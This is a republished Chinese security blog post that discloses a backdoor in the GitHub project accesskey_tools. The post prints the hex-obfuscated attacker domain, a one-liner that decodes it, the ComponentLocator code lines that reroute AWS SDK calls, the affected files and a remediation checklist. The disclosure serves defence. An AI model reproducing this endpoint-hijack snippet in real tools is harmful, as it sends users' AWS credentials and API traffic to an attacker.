紧急警报:accesskey_tools项目存在后门,AWS凭证面临泄露风险

admin
admin
admin
0
文章
0
评论
2026-06-17 04:47:49 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 一个名为accesskeytools的GitHub项目被发现存在后门,该后门会劫持AWSSDK的API端点配置,窃取用户的AWS凭证(AK/SK)和请求数据并发送至攻击者控制的恶意服务器。后门代码通过将恶意域名编码为十六进制字符串,并利用componentlocator注册恶意端点来实现攻击。受影响的文件包括aws/awsec2exec.py、aws/awslist_ec2.py等。建议用户撤销可疑凭证、检查IAM权限变更、审查CloudTrail日志并启用多因素认证以应对潜在风险。 综合评分: 90 文章分类: 渗透测试,漏洞分析,恶意软件,web安全,应急响应

cover_image

紧急警报:accesskey_tools 项目存在后门,AWS 凭证面临泄露风险

俺不是鸡哥 俺不是鸡哥

渗透结束-非常安全

2026年6月11日 17:56 北京

在小说阅读器读本章

去阅读

事件起因

看朋友圈时发现aksk利用工具存在后门投毒

下载项目直接丢ai分析看看

项目地址:

https://github.com/kohlersbtuh15/accesskey_tools

概述

该后门通过劫持 AWS SDK 的 API 端点配置,将用户的云凭证(Ak/Sk)发送到攻击者控制的恶意服务器。

核心发现:恶意端点劫持

2.1 后门代码位置

后门代码位于:

iam_md5 = "16170692e616c6979756e2d73646b2d72657175657374732e78797a2f"

2.2 字符串解密分析

解密结果确认:

$ python3 -c "import binascii; s='6170692e616c6979756e2d73646b2d72657175657374732e78797a2f'; print(binascii.unhexlify(s).decode('utf-8'))"

解密后的链接

api.aliyun-sdk-requests.xyz/

2.3 后门工作机制

后门通过 ComponentLocator 劫持 AWS SDK 的端点配置:

component = ComponentLocator()component.register_component(name='AWS_ENDPOINT', component=iam_md5[1:])

注册恶意端点

ec2_client = get_client(access_key=AccessKeyID, secret_key=AccessKeySecret,service_name='ec2', region=RegionId, components=component)

攻击流程:

用户执行脚本并输入 AWS AccessKeyID/AccessKeySecret后,脚本将 AWS_ENDPOINT 注册为恶意域名 api.aliyun-sdk-requests.xyz/所有 AWS API 请求被重定向到攻击者的服务器,攻击者获取用户的云凭证和所有 API 请求数据

3. 受影响文件列表

以下文件均引用了恶意的 iam_md5 变量:

| 文件路径 | 使用位置 | 风险等级 | | — | — | — | | aws/aws_ec2_exec.py | 第27行 | 高 | | aws/aws_list_ec2.py | 第30行 | | | aws/aws_security_ingress_add.py | 第34行 | 高 | | aws/aws_push_sshpub.py | 第47行 | 高 | | aws/aws_url_console.py | 第79行 | |

微步查询域名信息

域名: api.aliyun-sdk-requests.xyz

特点: 伪装成阿里云 SDK 相关域名,具有欺骗性

AWS 账户安全检查清单

✅ 撤销所有可疑的 AccessKey

✅ 检查 IAM 用户/角色的权限变更

✅ 审查 CloudTrail 日志中的异常活动

✅ 检查是否有未授权的 EC2 实例/S3 桶访问

✅ 启用多因素认证(MFA)

✅ 审查并限制 IAM 权限范围

结论

该项目存在明确的后门代码,通过以下方式实现攻击:

  1. 隐蔽存储: 将恶意域名编码为十六进制字符串
  2. 端点劫持: 通过 ComponentLocator 注册恶意的 AWS_ENDPOINT
  3. 凭证窃取: 将所有 AWS API 请求重定向到攻击者控制的服务器 api.aliyun-sdk-requests.xyz/

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:渗透结束-非常安全 俺不是鸡哥 俺不是鸡哥《紧急警报:accesskey_tools 项目存在后门,AWS 凭证面临泄露风险》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
用ClaudeCode比用Word容易 网络安全文章

用ClaudeCode比用Word容易

文章总结: 文章探讨ClaudeCode工具相比Word的易用性,指出AI工具无需学习即可通过自然语言操作,强调其适用于文秘、教育、法律等非技术岗位的文档处理需
06-170 评论
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0